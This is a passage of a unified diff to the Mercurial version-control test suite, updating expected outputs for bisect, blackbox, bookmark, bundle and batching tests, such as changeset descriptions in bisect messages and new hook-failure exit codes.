91360952243723bd5b1138d5f26bd8c8564cb553 + extra: merged = yes $ mv .hg/merge/state2 .hg/merge/state2-moved $ hg debugmergestate -v no version 2 merge state diff --git a/tests/test-batching.py b/tests/test-batching.py --- a/tests/test-batching.py +++ b/tests/test-batching.py @@ -204,7 +204,7 @@ @wireprotov1peer.batchable def foo(self, one, two=None): - encargs = [ + encoded_args = [ ( b'one', mangle(one), @@ -214,9 +214,9 @@ mangle(two), ), ] - encresref = wireprotov1peer.future() - yield encargs, encresref - yield unmangle(encresref.value) + encoded_res_future = wireprotov1peer.future() + yield encoded_args, encoded_res_future + yield unmangle(encoded_res_future.value) @wireprotov1peer.batchable def bar(self, b, a): diff --git a/tests/test-bisect.t b/tests/test-bisect.t --- a/tests/test-bisect.t +++ b/tests/test-bisect.t @@ -200,25 +200,25 @@ update: (current) phases: 32 draft $ hg bisect -g 1 - Testing changeset 16:a2e6ea4973e9 (30 changesets remaining, ~4 tests) + Testing changeset 16:a2e6ea4973e9 "msg 16" (30 changesets remaining, ~4 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -g - Testing changeset 23:5ec79163bff4 (15 changesets remaining, ~3 tests) + Testing changeset 23:5ec79163bff4 "msg 23" (15 changesets remaining, ~3 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved skip $ hg bisect -s - Testing changeset 24:10e0acd3809e (15 changesets remaining, ~3 tests) + Testing changeset 24:10e0acd3809e "msg 24" (15 changesets remaining, ~3 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -g - Testing changeset 27:288867a866e9 (7 changesets remaining, ~2 tests) + Testing changeset 27:288867a866e9 "msg 27" (7 changesets remaining, ~2 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -g - Testing changeset 29:b5bd63375ab9 (4 changesets remaining, ~2 tests) + Testing changeset 29:b5bd63375ab9 "msg 29" (4 changesets remaining, ~2 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -b - Testing changeset 28:8e0c2264c8af (2 changesets remaining, ~1 tests) + Testing changeset 28:8e0c2264c8af "msg 28" (2 changesets remaining, ~1 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -g The first bad revision is: @@ -234,7 +234,7 @@ $ hg bisect -b "0::3" $ hg bisect -s "13::16" $ hg bisect -g "26::tip" - Testing changeset 12:1941b52820a5 (23 changesets remaining, ~4 tests) + Testing changeset 12:1941b52820a5 "msg 12" (23 changesets remaining, ~4 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ cat .hg/bisect.state bad b99c7b9c8e11558adef3fad9af211c58d46f325b @@ -258,25 +258,25 @@ $ hg bisect -r $ hg bisect -b null $ hg bisect -g tip - Testing changeset 15:e7fa0811edb0 (32 changesets remaining, ~5 tests) + Testing changeset 15:e7fa0811edb0 "msg 15" (32 changesets remaining, ~5 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -g - Testing changeset 7:03750880c6b5 (16 changesets remaining, ~4 tests) + Testing changeset 7:03750880c6b5 "msg 7" (16 changesets remaining, ~4 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved skip $ hg bisect -s - Testing changeset 6:a3d5c6fdf0d3 (16 changesets remaining, ~4 tests) + Testing changeset 6:a3d5c6fdf0d3 "msg 6" (16 changesets remaining, ~4 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -g - Testing changeset 2:db07c04beaca (7 changesets remaining, ~2 tests) + Testing changeset 2:db07c04beaca "msg 2" (7 changesets remaining, ~2 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -g - Testing changeset 0:b99c7b9c8e11 (3 changesets remaining, ~1 tests) + Testing changeset 0:b99c7b9c8e11 "msg 0" (3 changesets remaining, ~1 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -b - Testing changeset 1:5cd978ea5149 (2 changesets remaining, ~1 tests) + Testing changeset 1:5cd978ea5149 "msg 1" (2 changesets remaining, ~1 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -g The first good revision is: @@ -295,7 +295,7 @@ $ hg bisect -r $ hg bisect -g null $ hg bisect -bU tip - Testing changeset 15:e7fa0811edb0 (32 changesets remaining, ~5 tests) + Testing changeset 15:e7fa0811edb0 "msg 15" (32 changesets remaining, ~5 tests) $ hg id 5cd978ea5149 @@ -306,13 +306,13 @@ $ hg bisect -r $ hg bisect -b 4 $ hg bisect -g 0 - Testing changeset 2:db07c04beaca (4 changesets remaining, ~2 tests) + Testing changeset 2:db07c04beaca "msg 2" (4 changesets remaining, ~2 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -s - Testing changeset 1:5cd978ea5149 (4 changesets remaining, ~2 tests) + Testing changeset 1:5cd978ea5149 "msg 1" (4 changesets remaining, ~2 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -s - Testing changeset 3:b53bea5e2fcb (4 changesets remaining, ~2 tests) + Testing changeset 3:b53bea5e2fcb "msg 3" (4 changesets remaining, ~2 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -s Due to skipped revisions, the first bad revision could be any of: @@ -343,7 +343,7 @@ $ hg bisect -r $ hg bisect -g 0 $ hg bisect -b 2 - Testing changeset 1:5cd978ea5149 (2 changesets remaining, ~1 tests) + Testing changeset 1:5cd978ea5149 "msg 1" (2 changesets remaining, ~1 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -s Due to skipped revisions, the first bad revision could be any of: @@ -372,19 +372,19 @@ $ hg bisect -r $ hg bisect -b 6 $ hg bisect -g 0 - Testing changeset 3:b53bea5e2fcb (6 changesets remaining, ~2 tests) + Testing changeset 3:b53bea5e2fcb "msg 3" (6 changesets remaining, ~2 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -s - Testing changeset 2:db07c04beaca (6 changesets remaining, ~2 tests) + Testing changeset 2:db07c04beaca "msg 2" (6 changesets remaining, ~2 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -s - Testing changeset 4:9b2ba8336a65 (6 changesets remaining, ~2 tests) + Testing changeset 4:9b2ba8336a65 "msg 4" (6 changesets remaining, ~2 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -s - Testing changeset 1:5cd978ea5149 (6 changesets remaining, ~2 tests) + Testing changeset 1:5cd978ea5149 "msg 1" (6 changesets remaining, ~2 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -s - Testing changeset 5:7874a09ea728 (6 changesets remaining, ~2 tests) + Testing changeset 5:7874a09ea728 "msg 5" (6 changesets remaining, ~2 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -g The first bad revision is: @@ -473,17 +473,17 @@ $ hg bisect -r $ hg up -qr tip $ hg bisect --command "\"$PYTHON\" \"$TESTTMP/script.py\" and some parameters" - changeset 31:58c80a7c8a40: good + changeset 31:58c80a7c8a40 tip "msg 31": good abort: cannot bisect (no known bad revisions) [20] $ hg up -qr 0 $ hg bisect --command "\"$PYTHON\" \"$TESTTMP/script.py\" and some parameters" - changeset 0:b99c7b9c8e11: bad - changeset 15:e7fa0811edb0: good - changeset 7:03750880c6b5: good - changeset 3:b53bea5e2fcb: bad - changeset 5:7874a09ea728: bad - changeset 6:a3d5c6fdf0d3: good + changeset 0:b99c7b9c8e11 "msg 0": bad + changeset 15:e7fa0811edb0 "msg 15": good + changeset 7:03750880c6b5 "msg 7": good + changeset 3:b53bea5e2fcb "msg 3": bad + changeset 5:7874a09ea728 "msg 5": bad + changeset 6:a3d5c6fdf0d3 "msg 6": good The first good revision is: changeset: 6:a3d5c6fdf0d3 user: test @@ -510,13 +510,13 @@ $ hg bisect -r $ hg bisect --good tip --noupdate $ hg bisect --bad 0 --noupdate - Testing changeset 15:e7fa0811edb0 (31 changesets remaining, ~4 tests) + Testing changeset 15:e7fa0811edb0 "msg 15" (31 changesets remaining, ~4 tests) $ hg bisect --command "sh \"$TESTTMP/script.sh\" and some params" --noupdate - changeset 15:e7fa0811edb0: good - changeset 7:03750880c6b5: good - changeset 3:b53bea5e2fcb: bad - changeset 5:7874a09ea728: bad - changeset 6:a3d5c6fdf0d3: good + changeset 15:e7fa0811edb0 "msg 15": good + changeset 7:03750880c6b5 "msg 7": good + changeset 3:b53bea5e2fcb "msg 3": bad + changeset 5:7874a09ea728 "msg 5": bad + changeset 6:a3d5c6fdf0d3 "msg 6": good The first good revision is: changeset: 6:a3d5c6fdf0d3 user: test @@ -543,17 +543,17 @@ $ hg bisect -r $ hg up -qr tip $ hg bisect --command "sh \"$TESTTMP/script.sh\" and some params" - changeset 31:58c80a7c8a40: good + changeset 31:58c80a7c8a40 tip "msg 31": good abort: cannot bisect (no known bad revisions) [20] $ hg up -qr 0 $ hg bisect --command "sh \"$TESTTMP/script.sh\" and some params" - changeset 0:b99c7b9c8e11: bad - changeset 15:e7fa0811edb0: good - changeset 7:03750880c6b5: good - changeset 3:b53bea5e2fcb: bad - changeset 5:7874a09ea728: bad - changeset 6:a3d5c6fdf0d3: good + changeset 0:b99c7b9c8e11 "msg 0": bad + changeset 15:e7fa0811edb0 "msg 15": good + changeset 7:03750880c6b5 "msg 7": good + changeset 3:b53bea5e2fcb "msg 3": bad + changeset 5:7874a09ea728 "msg 5": bad + changeset 6:a3d5c6fdf0d3 "msg 6": good The first good revision is: changeset: 6:a3d5c6fdf0d3 user: test @@ -586,13 +586,13 @@ $ hg bisect --reset $ hg bisect --good 15 $ hg bisect --bad 30 - Testing changeset 22:06c7993750ce (15 changesets remaining, ~3 tests) + Testing changeset 22:06c7993750ce "msg 22" (15 changesets remaining, ~3 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect --command true - changeset 22:06c7993750ce: good - changeset 26:3efc6fd51aeb: good - changeset 28:8e0c2264c8af: good - changeset 29:b5bd63375ab9: good + changeset 22:06c7993750ce "msg 22": good + changeset 26:3efc6fd51aeb "msg 26": good + changeset 28:8e0c2264c8af "msg 28": good + changeset 29:b5bd63375ab9 "msg 29": good The first bad revision is: changeset: 30:ed2d2f24b11c tag: tip @@ -735,11 +735,11 @@ $ hg bisect --reset $ hg bisect --good . $ hg bisect --bad 25 - Testing changeset 28:8e0c2264c8af (6 changesets remaining, ~2 tests) + Testing changeset 28:8e0c2264c8af "msg 28" (6 changesets remaining, ~2 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect --command true - changeset 28:8e0c2264c8af: good - changeset 26:3efc6fd51aeb: good + changeset 28:8e0c2264c8af "msg 28": good + changeset 26:3efc6fd51aeb "msg 26": good The first good revision is: changeset: 26:3efc6fd51aeb user: test diff --git a/tests/test-bisect2.t b/tests/test-bisect2.t --- a/tests/test-bisect2.t +++ b/tests/test-bisect2.t @@ -252,7 +252,7 @@ $ hg bisect -r $ hg bisect -g 0 $ hg bisect -b 17 # -> update to rev 6 - Testing changeset 6:a214d5d3811a (15 changesets remaining, ~3 tests) + Testing changeset 6:a214d5d3811a "merge 4,5" (15 changesets remaining, ~3 tests) 0 files updated, 0 files merged, 2 files removed, 0 files unresolved $ hg log -q -r 'bisect(pruned)' 0:33b1f9bc8bc5 @@ -274,16 +274,16 @@ 16:609d82a7ebae $ hg log -q -r 'bisect(ignored)' $ hg bisect -g # -> update to rev 13 - Testing changeset 13:b0a32c86eb31 (9 changesets remaining, ~3 tests) + Testing changeset 13:b0a32c86eb31 "13" (9 changesets remaining, ~3 tests) 3 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg bisect -s # -> update to rev 10 - Testing changeset 10:429fcd26f52d (9 changesets remaining, ~3 tests) + Testing changeset 10:429fcd26f52d "merge 6,9" (9 changesets remaining, ~3 tests) 3 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg bisect -b # -> update to rev 8 - Testing changeset 8:dab8161ac8fc (3 changesets remaining, ~1 tests) + Testing changeset 8:dab8161ac8fc "8" (3 changesets remaining, ~1 tests) 2 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg bisect -g # -> update to rev 9 - Testing changeset 9:3c77083deb4a (2 changesets remaining, ~1 tests) + Testing changeset 9:3c77083deb4a "9" (2 changesets remaining, ~1 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -b The first bad revision is: @@ -350,10 +350,10 @@ $ hg bisect -r $ hg bisect -g 18 $ hg bisect -b 1 # -> update to rev 6 - Testing changeset 6:a214d5d3811a (13 changesets remaining, ~3 tests) + Testing changeset 6:a214d5d3811a "merge 4,5" (13 changesets remaining, ~3 tests) 2 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg bisect -s # -> update to rev 10 - Testing changeset 10:429fcd26f52d (13 changesets remaining, ~3 tests) + Testing changeset 10:429fcd26f52d "merge 6,9" (13 changesets remaining, ~3 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg log -q -r 'bisect(pruned)' 0:33b1f9bc8bc5 @@ -361,7 +361,7 @@ 6:a214d5d3811a 18:d42e18c7bc9b $ hg bisect -b # -> update to rev 12 - Testing changeset 12:9f259202bbe7 (5 changesets remaining, ~2 tests) + Testing changeset 12:9f259202bbe7 "12" (5 changesets remaining, ~2 tests) 3 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg log -q -r 'bisect(pruned)' 0:33b1f9bc8bc5 @@ -381,7 +381,7 @@ 13:b0a32c86eb31 15:857b178a7cf3 $ hg bisect -b # -> update to rev 13 - Testing changeset 13:b0a32c86eb31 (3 changesets remaining, ~1 tests) + Testing changeset 13:b0a32c86eb31 "13" (3 changesets remaining, ~1 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -g The first good revision is: @@ -414,7 +414,7 @@ $ hg bisect -r $ hg bisect -g 1 $ hg bisect -b 16 # -> update to rev 6 - Testing changeset 6:a214d5d3811a (13 changesets remaining, ~3 tests) + Testing changeset 6:a214d5d3811a "merge 4,5" (13 changesets remaining, ~3 tests) 2 files updated, 0 files merged, 2 files removed, 0 files unresolved $ hg log -q -r 'bisect(pruned)' 0:33b1f9bc8bc5 @@ -422,13 +422,13 @@ 16:609d82a7ebae 17:228c06deef46 $ hg bisect -g # -> update to rev 13 - Testing changeset 13:b0a32c86eb31 (8 changesets remaining, ~3 tests) + Testing changeset 13:b0a32c86eb31 "13" (8 changesets remaining, ~3 tests) 3 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg bisect -s # -> update to rev 10 - Testing changeset 10:429fcd26f52d (8 changesets remaining, ~3 tests) + Testing changeset 10:429fcd26f52d "merge 6,9" (8 changesets remaining, ~3 tests) 3 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg bisect -s # -> update to rev 12 - Testing changeset 12:9f259202bbe7 (8 changesets remaining, ~3 tests) + Testing changeset 12:9f259202bbe7 "12" (8 changesets remaining, ~3 tests) 3 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg log -q -r 'bisect(pruned)' 0:33b1f9bc8bc5 @@ -443,10 +443,10 @@ 16:609d82a7ebae 17:228c06deef46 $ hg bisect -g # -> update to rev 9 - Testing changeset 9:3c77083deb4a (5 changesets remaining, ~2 tests) + Testing changeset 9:3c77083deb4a "9" (5 changesets remaining, ~2 tests) 1 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg bisect -s # -> update to rev 15 - Testing changeset 15:857b178a7cf3 (5 changesets remaining, ~2 tests) + Testing changeset 15:857b178a7cf3 "merge 10,13" (5 changesets remaining, ~2 tests) 3 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg log -q -r 'bisect(ignored)' $ hg bisect -b @@ -500,13 +500,13 @@ $ hg bisect -r $ hg bisect -g 17 $ hg bisect -b 8 # -> update to rev 10 - Testing changeset 13:b0a32c86eb31 (8 changesets remaining, ~3 tests) + Testing changeset 13:b0a32c86eb31 "13" (8 changesets remaining, ~3 tests) 2 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg bisect -b # -> update to rev 13 - Testing changeset 10:429fcd26f52d (5 changesets remaining, ~2 tests) + Testing changeset 10:429fcd26f52d "merge 6,9" (5 changesets remaining, ~2 tests) 3 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg bisect -b # -> update to rev 15 - Testing changeset 15:857b178a7cf3 (3 changesets remaining, ~1 tests) + Testing changeset 15:857b178a7cf3 "merge 10,13" (3 changesets remaining, ~1 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg log -q -r 'bisect(pruned)' 0:33b1f9bc8bc5 @@ -524,7 +524,7 @@ 13:b0a32c86eb31 17:228c06deef46 $ hg bisect -s # -> update to rev 16 - Testing changeset 16:609d82a7ebae (3 changesets remaining, ~1 tests) + Testing changeset 16:609d82a7ebae "16" (3 changesets remaining, ~1 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg log -q -r 'bisect(pruned)' 0:33b1f9bc8bc5 @@ -612,7 +612,7 @@ $ hg bisect -r $ hg bisect -b 17 $ hg bisect -g 11 - Testing changeset 13:b0a32c86eb31 (5 changesets remaining, ~2 tests) + Testing changeset 13:b0a32c86eb31 "13" (5 changesets remaining, ~2 tests) 3 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg log -q -r 'bisect(ignored)' 2:051e12f87bf1 @@ -623,7 +623,7 @@ 9:3c77083deb4a 10:429fcd26f52d $ hg bisect -g - Testing changeset 15:857b178a7cf3 (3 changesets remaining, ~1 tests) + Testing changeset 15:857b178a7cf3 "merge 10,13" (3 changesets remaining, ~1 tests) 3 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -b The first bad revision is: @@ -665,7 +665,7 @@ 9:3c77083deb4a 10:429fcd26f52d $ hg bisect --extend - Extending search to changeset 8:dab8161ac8fc + Extending search to changeset 8:dab8161ac8fc "8" 2 files updated, 0 files merged, 2 files removed, 0 files unresolved $ hg log -q -r 'bisect(untested)' $ hg log -q -r 'bisect(ignored)' @@ -677,7 +677,7 @@ 9:3c77083deb4a 10:429fcd26f52d $ hg bisect -g # dab8161ac8fc - Testing changeset 9:3c77083deb4a (3 changesets remaining, ~1 tests) + Testing changeset 9:3c77083deb4a "9" (3 changesets remaining, ~1 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg log -q -r 'bisect(untested)' 9:3c77083deb4a @@ -757,13 +757,13 @@ $ hg bisect -r $ hg bisect -b 13 $ hg bisect -g 8 - Testing changeset 11:82ca6f06eccd (3 changesets remaining, ~1 tests) + Testing changeset 11:82ca6f06eccd "11" (3 changesets remaining, ~1 tests) 2 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg log -q -r 'bisect(untested)' 11:82ca6f06eccd 12:9f259202bbe7 $ hg bisect -g 2 - Testing changeset 11:82ca6f06eccd (3 changesets remaining, ~1 tests) + Testing changeset 11:82ca6f06eccd "11" (3 changesets remaining, ~1 tests) 0 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg log -q -r 'bisect(untested)' 11:82ca6f06eccd diff --git a/tests/test-bisect3.t b/tests/test-bisect3.t --- a/tests/test-bisect3.t +++ b/tests/test-bisect3.t @@ -72,13 +72,13 @@ $ hg bisect --good 4 $ hg bisect --good 6 $ hg bisect --bad 12 - Testing changeset 9:2197c557e14c (6 changesets remaining, ~2 tests) + Testing changeset 9:2197c557e14c "9=8+3" (6 changesets remaining, ~2 tests) 1 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg bisect --bad 10 - Testing changeset 8:e74a86251f58 (4 changesets remaining, ~2 tests) + Testing changeset 8:e74a86251f58 "8" (4 changesets remaining, ~2 tests) 0 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg bisect --skip 7 - Testing changeset 8:e74a86251f58 (4 changesets remaining, ~2 tests) + Testing changeset 8:e74a86251f58 "8" (4 changesets remaining, ~2 tests) 0 files updated, 0 files merged, 0 files removed, 0 files unresolved test template diff --git a/tests/test-blackbox.t b/tests/test-blackbox.t --- a/tests/test-blackbox.t +++ b/tests/test-blackbox.t @@ -317,6 +317,17 @@ 1970/01/01 00:00:00 bob @45589e459b2edfbf3dbde7e01f611d2c1e7453d7 (5000)> --debug log -r tip exited 0 after *.?? seconds (glob) 1970/01/01 00:00:00 bob @45589e459b2edfbf3dbde7e01f611d2c1e7453d7 (5000)> blackbox +Skip rotation if the .hg is read-only + +#if unix-permissions + $ chmod -w .hg + $ hg log -r. -T '{rev}\n' --config blackbox.maxsize=1 --debug + warning: cannot rename '$TESTTMP/blackboxtest3/.hg/blackbox.log.1' to '$TESTTMP/blackboxtest3/.hg/blackbox.log': Permission denied + warning: cannot write to blackbox.log: Permission denied + 1 + $ chmod +w .hg +#endif + Test log recursion from dirty status check $ cat > ../r.py <<EOF diff --git a/tests/test-bookmarks-pushpull.t b/tests/test-bookmarks-pushpull.t --- a/tests/test-bookmarks-pushpull.t +++ b/tests/test-bookmarks-pushpull.t @@ -129,10 +129,10 @@ bundle2-output: bundle parameter: bundle2-output: start of parts bundle2-output: bundle part: "replycaps" - bundle2-output-part: "replycaps" 241 bytes payload + bundle2-output-part: "replycaps" 224 bytes payload bundle2-output: part 0: "REPLYCAPS" bundle2-output: header chunk size: 16 - bundle2-output: payload chunk size: 241 + bundle2-output: payload chunk size: 224 bundle2-output: closing payload chunk bundle2-output: bundle part: "check:bookmarks" bundle2-output-part: "check:bookmarks" 23 bytes payload @@ -162,9 +162,9 @@ bundle2-input: part parameters: 0 bundle2-input: found a handler for part replycaps bundle2-input-part: "replycaps" supported - bundle2-input: payload chunk size: 241 + bundle2-input: payload chunk size: 224 bundle2-input: payload chunk size: 0 - bundle2-input-part: total payload size 241 + bundle2-input-part: total payload size 224 bundle2-input: part header size: 22 bundle2-input: part type: "CHECK:BOOKMARKS" bundle2-input: part id: "1" @@ -241,10 +241,10 @@ bundle2-output: bundle parameter: bundle2-output: start of parts bundle2-output: bundle part: "replycaps" - bundle2-output-part: "replycaps" 241 bytes payload + bundle2-output-part: "replycaps" 224 bytes payload bundle2-output: part 0: "REPLYCAPS" bundle2-output: header chunk size: 16 - bundle2-output: payload chunk size: 241 + bundle2-output: payload chunk size: 224 bundle2-output: closing payload chunk bundle2-output: bundle part: "check:bookmarks" bundle2-output-part: "check:bookmarks" 23 bytes payload @@ -275,9 +275,9 @@ bundle2-input: part parameters: 0 bundle2-input: found a handler for part replycaps bundle2-input-part: "replycaps" supported - bundle2-input: payload chunk size: 241 + bundle2-input: payload chunk size: 224 bundle2-input: payload chunk size: 0 - bundle2-input-part: total payload size 241 + bundle2-input-part: total payload size 224 bundle2-input: part header size: 22 bundle2-input: part type: "CHECK:BOOKMARKS" bundle2-input: part id: "1" @@ -1177,7 +1177,7 @@ searching for changes no changes found abort: prepushkey hook exited with status 1 - [255] + [40] #endif @@ -1217,7 +1217,7 @@ no changes found remote: prepushkey hook exited with status 1 abort: push failed on remote - [255] + [100] #endif @@ -1257,7 +1257,7 @@ no changes found remote: prepushkey hook exited with status 1 abort: push failed on remote - [255] + [100] #endif @@ -1334,7 +1334,7 @@ no changes found remote: prepushkey.no-bm-move hook exited with status 1 abort: push failed on remote - [255] + [100] #endif -- test for pushing bookmarks pointing to secret changesets diff --git a/tests/test-bookmarks.t b/tests/test-bookmarks.t --- a/tests/test-bookmarks.t +++ b/tests/test-bookmarks.t @@ -1125,7 +1125,7 @@ transaction abort! rollback completed abort: pretxnclose hook exited with status 1 - [255] + [40] $ cp .hg/bookmarks.pending.saved .hg/bookmarks.pending (check visible bookmarks while transaction running in repo) @@ -1158,7 +1158,7 @@ transaction abort! rollback completed abort: pretxnclose hook exited with status 1 - [255] + [40] Check pretxnclose-bookmark can abort a transaction -------------------------------------------------- @@ -1242,7 +1242,7 @@ transaction abort! rollback completed abort: pretxnclose-bookmark.force-public hook exited with status 1 - [255] + [40] create on a public changeset @@ -1254,4 +1254,4 @@ transaction abort! rollback completed abort: pretxnclose-bookmark.force-forward hook exited with status 1 - [255] + [40] diff --git a/tests/test-bundle-r.t b/tests/test-bundle-r.t --- a/tests/test-bundle-r.t +++ b/tests/test-bundle-r.t @@ -171,14 +171,15 @@ should fail $ hg -R test bundle --base 2 -r tip test-bundle-branch1.hg test-3 - abort: --base is incompatible with specifying a destination + abort: --base is incompatible with specifying destinations [10] $ hg -R test bundle -a -r tip test-bundle-branch1.hg test-3 - abort: --all is incompatible with specifying a destination + abort: --all is incompatible with specifying destinations [10] $ hg -R test bundle -r tip test-bundle-branch1.hg - abort: repository default-push not found - [255] + config error: default repository not configured! + (see 'hg help config.paths') + [30] $ hg -R test bundle --base 2 -r tip test-bundle-branch1.hg 2 changesets found @@ -223,7 +224,7 @@ adding changesets transaction abort! rollback completed - abort: 00changelog.i@93ee6ab32777: unknown parent + abort: 00changelog.i@93ee6ab32777cd430e07da694794fb6a4f917712: unknown parent [50] revision 2 diff --git a/tests/test-bundle-type.t b/tests/test-bundle-type.t --- a/tests/test-bundle-type.t +++ b/tests/test-bundle-type.t @@ -201,6 +201,15 @@ (see 'hg help bundlespec' for supported values for --type) [10] +zstd supports threading + + $ hg init test-compthreads + $ cd test-compthreads + $ hg debugbuilddag +3 + $ hg --config experimental.bundlecompthreads=1 bundle -a -t zstd-v2 zstd-v2-threaded.hg + 3 changesets found + $ cd .. + #else zstd is a valid engine but isn't available diff --git a/tests/test-bundle.t b/tests/test-bundle.t --- a/tests/test-bundle.t +++ b/tests/test-bundle.t @@ -295,18 +295,29 @@ #if reporevlogstore $ hg -R test debugcreatestreamclonebundle packed.hg - writing 2664 bytes for 6 files - bundle requirements: generaldelta, revlogv1, sparserevlog + writing 2664 bytes for 6 files (no-zstd !) + writing 2665 bytes for 6 files (zstd !) + bundle requirements: generaldelta, revlogv1, sparserevlog (no-rust !) + bundle requirements: generaldelta, persistent-nodemap, revlogv1, sparserevlog (rust !) $ f -B 64 --size --sha1 --hexdump packed.hg - packed.hg: size=2840, sha1=12bf3eee3eb8a04c503ce2d29b48f0135c7edff5 + packed.hg: size=2840, sha1=12bf3eee3eb8a04c503ce2d29b48f0135c7edff5 (no-zstd !) + packed.hg: size=2841, sha1=8b645a65f49b0ae43042a9f3da56d4bfdf1c7f99 (zstd no-rust !) + packed.hg: size=2860, sha1=81d7a2e535892cda51e82c200f818de2cca828d3 (rust !) 0000: 48 47 53 31 55 4e 00 00 00 00 00 00 00 06 00 00 |HGS1UN..........| - 0010: 00 00 00 00 0a 68 00 23 67 65 6e 65 72 61 6c 64 |.....h.#generald| - 0020: 65 6c 74 61 2c 72 65 76 6c 6f 67 76 31 2c 73 70 |elta,revlogv1,sp| - 0030: 61 72 73 65 72 65 76 6c 6f 67 00 64 61 74 61 2f |arserevlog.data/| + 0010: 00 00 00 00 0a 68 00 23 67 65 6e 65 72 61 6c 64 |.....h.#generald| (no-zstd !) + 0020: 65 6c 74 61 2c 72 65 76 6c 6f 67 76 31 2c 73 70 |elta,revlogv1,sp| (no-zstd !) + 0030: 61 72 73 65 72 65 76 6c 6f 67 00 64 61 74 61 2f |arserevlog.data/| (no-zstd !) + 0010: 00 00 00 00 0a 69 00 23 67 65 6e 65 72 61 6c 64 |.....i.#generald| (zstd no-rust !) + 0020: 65 6c 74 61 2c 72 65 76 6c 6f 67 76 31 2c 73 70 |elta,revlogv1,sp| (zstd no-rust !) + 0030: 61 72 73 65 72 65 76 6c 6f 67 00 64 61 74 61 2f |arserevlog.data/| (zstd no-rust !) + 0010: 00 00 00 00 0a 69 00 36 67 65 6e 65 72 61 6c 64 |.....i.6generald| (rust !) + 0020: 65 6c 74 61 2c 70 65 72 73 69 73 74 65 6e 74 2d |elta,persistent-| (rust !) + 0030: 6e 6f 64 65 6d 61 70 2c 72 65 76 6c 6f 67 76 31 |nodemap,revlogv1| (rust !) $ hg debugbundle --spec packed.hg - none-packed1;requirements%3Dgeneraldelta%2Crevlogv1%2Csparserevlog + none-packed1;requirements%3Dgeneraldelta%2Crevlogv1%2Csparserevlog (no-rust !) + none-packed1;requirements%3Dgeneraldelta%2Cpersistent-nodemap%2Crevlogv1%2Csparserevlog (rust !) generaldelta requirement is not listed in stream clone bundles unless used @@ -317,17 +328,23 @@ $ cd .. $ hg -R testnongd debugcreatestreamclonebundle packednongd.hg writing 301 bytes for 3 files - bundle requirements: revlogv1 + bundle requirements: revlogv1 (no-rust !) + bundle requirements: persistent-nodemap, revlogv1 (rust !) $ f -B 64 --size --sha1 --hexdump packednongd.hg - packednongd.hg: size=383, sha1=1d9c230238edd5d38907100b729ba72b1831fe6f + packednongd.hg: size=383, sha1=1d9c230238edd5d38907100b729ba72b1831fe6f (no-rust !) + packednongd.hg: size=402, sha1=d3cc1417f0e8142cf9340aaaa520b660ad3ec3ea (rust !) 0000: 48 47 53 31 55 4e 00 00 00 00 00 00 00 03 00 00 |HGS1UN..........| - 0010: 00 00 00 00 01 2d 00 09 72 65 76 6c 6f 67 76 31 |.....-..revlogv1| - 0020: 00 64 61 74 61 2f 66 6f 6f 2e 69 00 36 34 0a 00 |.data/foo.i.64..| - 0030: 01 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| + 0010: 00 00 00 00 01 2d 00 09 72 65 76 6c 6f 67 76 31 |.....-..revlogv1| (no-rust !) + 0020: 00 64 61 74 61 2f 66 6f 6f 2e 69 00 36 34 0a 00 |.data/foo.i.64..| (no-rust !) + 0030: 01 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| (no-rust !) + 0010: 00 00 00 00 01 2d 00 1c 70 65 72 73 69 73 74 65 |.....-..persiste| (rust !) + 0020: 6e 74 